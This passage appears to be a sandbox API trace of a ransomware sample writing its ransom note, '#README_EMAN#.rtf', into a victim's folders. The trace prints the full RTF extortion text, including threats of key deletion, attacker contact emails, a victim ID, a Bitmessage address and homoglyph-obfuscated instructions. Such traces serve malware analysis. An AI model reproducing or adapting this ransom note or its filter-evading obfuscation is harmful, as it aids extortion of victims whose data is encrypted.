lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.703] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.703] CloseHandle (hObject=0x27c) returned 1 [0301.706] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\#readme_eman#.rtf")) returned 0xffffffff [0301.706] GetLastError () returned 0x2 [0301.706] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) Thread: id = 788 os_tid = 0xeb8 Thread: id = 802 os_tid = 0x54c Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2f0aa000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 